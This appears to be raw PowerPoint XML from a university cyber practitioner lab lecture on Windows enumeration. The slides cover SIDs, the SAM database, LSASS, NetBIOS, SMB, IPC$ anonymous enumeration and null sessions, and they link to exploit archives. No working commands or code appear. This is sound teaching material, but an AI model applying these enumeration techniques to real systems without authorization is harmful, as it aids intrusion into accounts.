              <a:prstClr val="black">
                <a:alpha val="4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467600" cy="45259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422064"/>
            <a:ext cx="2133600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" bIns="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:shade val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{BF42B08F-7201-4881-BAE0-A32C1D4254DA}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3/6/2024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3124200" y="6422064"/>
            <a:ext cx="2895600" cy="365125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" rIns="0" bIns="0" anchor="b"/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:defRPr kumimoji="0" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:shade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8153400" y="6422064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000">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:shade val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{40B0EF93-A27B-488A-AF90-2665E003BCF2}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"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817" r:id="rId1"/>
    <p:sldLayoutId id="2147483818" r:id="rId2"/>
    <p:sldLayoutId id="2147483819" r:id="rId3"/>
    <p:sldLayoutId id="2147483820" r:id="rId4"/>
    <p:sldLayoutId id="2147483821" r:id="rId5"/>
    <p:sldLayoutId id="2147483822" r:id="rId6"/>
    <p:sldLayoutId id="2147483823" r:id="rId7"/>
    <p:sldLayoutId id="2147483824" r:id="rId8"/>
    <p:sldLayoutId id="2147483825" r:id="rId9"/>
    <p:sldLayoutId id="2147483826" r:id="rId10"/>
    <p:sldLayoutId id="2147483827" r:id="rId11"/>
  </p:sldLayoutIdLst>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:buNone/>
        <a:defRPr kumimoji="0" sz="4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20624" indent="-384048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"/>
        <a:defRPr kumimoji="0"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722376" indent="-274320" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent1"/>
        </a:buClr>
        <a:buSzPct val="90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56032" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent2"/>
        </a:buClr>
        <a:buSzPct val="85000"/>
        <a:buFont typeface="Arial"/>
        <a:buChar char="○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37744" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent3"/>
        </a:buClr>
        <a:buSzPct val="90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90472" indent="-182880" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent4"/>
        </a:buClr>
        <a:buSzPct val="100000"/>
        <a:buFont typeface="Arial"/>
        <a:buChar char="-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00784" indent="-182880" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent5"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="-"/>
        <a:defRPr kumimoji="0" sz="20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100000"/>
        <a:buFont typeface="Arial"/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39696" indent="-182880" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buFont typeface="Arial"/>
        <a:buChar char="▪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31720" indent="-182880" algn="l" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:buClr>
          <a:schemeClr val="accent6"/>
        </a:buClr>
        <a:buFont typeface="Arial"/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packetstormsecurity.org/files" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.packetstormsecurity.org/files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www.exploit-db.com/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thec2matrix.com/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1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Dl6qNRCiPgo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astandeasyhacking.com/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jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2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ackerone.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.scmagazine.com/home/network-security/teen-racks-up-more-than-1m-in-bug-bounties-on-hackerone-platform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tiff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hyperlink" Target="http://insecure.org/stf/smashstack.html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" y="457200"/>
            <a:ext cx="8686800" cy="2438399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>CYBR644 – Cyber Practitioner Lab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1552" y="4724400"/>
            <a:ext cx="6480048" cy="1752600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spring 2024</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>University of Maryland, Baltimore County</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Michael </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Hennick</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 20" descr="C:\Users\mhenni\Pictures\cyber-server farm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057400"/>
            <a:ext cx="4776257" cy="318792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25051" t="7698" r="24522" b="6981"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7462239" y="4038600"/>
            <a:ext cx="1529361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202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6" dur="30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150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848600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Windows Enumeration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024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52988"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>The goal is to identify a user or system account to be exploited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows OS is available in client and server versions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows Vista, 7, and 8 are examples of client systems.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows Server 2003, 2008, and 2012 are examples of server systems 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en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows Architecture has two basic modes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User mode (ring 3):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Has restrictions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious programs can be detected by antivirus tools.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Kernel mode (ring 0 ):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Allows full access to all resources.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Malicious code can hide and is harder to detect.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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096924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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Windows Enumeration cont.</a:t>
            </a:r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endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128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en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>All code runs in a context of an account.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en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Security identifiers:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Security identifiers (SID):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Identifies users, groups, and computer accounts </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Relative identifiers (RID):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Portion of SID that identifies a user or group in relation to the authority the user has</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2000">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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552973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077200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Windows Security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12291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16475"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User accounts and passwords are stored in </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SAM database on the local machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Windows registry – HKLM-SAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Active Directory in domain environment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Local Security Authority subsystem (Lsass)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>User mode process responsible for local security policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>NetBIOS </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A vulnerability in Windows legacy system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Used with  Secure Message Blocks (SMB) to remotely access shared files and directories   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12892855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077200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>Windows Security cont.</a:t>
            </a:r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en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>SMB: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Enables remote access of shared directories and files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Makes it possible for user to create shares</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>InterProcess Communication (IPC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Offers a default share on Windows system – IPC$</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>A hidden share.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Enables anonymous connection using the net view and net use command in Windows 2000/XP/2003.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>IPC$ can be used to enumerate user details, account information, and weak passwords.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34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308995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458200" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
                      <a:alpha val="50000"/>
                    </a:prstClr>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>NetBIOS Enumeration Tools</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1433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000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Set up a Null session:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="ＭＳ Ｐゴシック" pitchFamily="34" charset="-128"/>
              </a:rPr>
              <a:t>Set up manually using the net use command.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000">
